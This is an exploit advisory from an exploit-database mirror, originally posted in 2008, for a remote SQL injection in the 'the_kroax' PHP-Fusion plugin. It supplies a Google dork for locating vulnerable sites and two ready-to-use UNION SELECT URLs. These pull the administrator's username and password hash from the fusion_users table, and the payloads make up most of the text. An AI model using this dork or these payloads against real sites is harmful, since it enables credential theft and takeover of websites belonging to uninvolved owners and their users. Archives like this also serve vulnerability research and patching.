exploit-db-mirror/exploits/php/webapps/5942.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

41 lines
No EOL
1.2 KiB
Text

==========================================================
The kroax php_fusion Remote SQL-injection.
==========================================================
##################################
Author : boom3rang
Contact : boomerang@knaqu-shqipe.de
webpage : www.khg-crew.ws
##################################
--- Remote SQL Injection ---
[+]Google Dork: inurl:"kroax.php?category"
--------------
Exploit
--------------
example:
www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
[+] password:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password.
========================================================== Greetz to: All my Albanian brothers ==========================================================
# milw0rm.com [2008-06-26]